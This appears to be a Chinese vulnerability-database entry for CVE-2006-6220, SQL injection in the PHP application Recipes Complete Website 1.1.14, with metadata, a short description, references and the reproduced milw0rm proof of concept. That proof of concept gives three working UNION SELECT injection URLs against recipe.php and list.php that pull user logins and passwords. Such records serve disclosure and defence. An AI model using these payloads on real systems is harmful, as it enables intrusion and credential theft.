Recipes Website 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111650 漏洞类型 SQL注入
发布时间 2006-11-23 更新时间 2007-03-08
CVE编号 CVE-2006-6220 CNNVD-ID CNNVD-200611-475
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2834
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-475
|漏洞详情
RecipesWebsite(RecipesCompleteWebsite)存在多个SQL注入漏洞,远程攻击者可以通过传给recipe.php的(1)recipeid参数,或者传给list.php的(2)categoryid参数,来执行任意SQL命令。
|漏洞EXP
*************************************************************************************************************************#
                                                              					          		 #
			               			 Coding 4 Fun     						 #	
			                                      						  		 #
*************************************************************************************************************************#
													  		 #
* Recipes Complete Website 1.1.14  (http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2) ; 	 #
													  		 #	
* Class = SQL Injection ;										  		 #
   													  		 #
* Download = http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3 ;				 #
													  		 #
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 #
												  	  		 #
-------------------------------------------------------------------------------------------------------------------------#
													  		 #
													  		 #
- PoC:												          		 #
													  		 #
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* 		 #
															 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*  - login      #											  
													  		 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #
															 #
*************************************************************************************************************************#													  				
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 #
												          		 #
*************************************************************************************************************************#

# milw0rm.com [2006-11-23]
|参考资料

来源:XF
名称:recipes-list-sql-injection(30509)
链接:http://xforce.iss.net/xforce/xfdb/30509
来源:BID
名称:21270
链接:http://www.securityfocus.com/bid/21270
来源:MILW0RM
名称:2834
链接:http://www.milw0rm.com/exploits/2834
来源:VUPEN
名称:ADV-2006-4686
链接:http://www.frsirt.com/english/advisories/2006/4686
来源:SECUNIA
名称:23083
链接:http://secunia.com/advisories/23083
来源:MILW0RM
名称:2834
链接:http://milw0rm.com/exploits/2834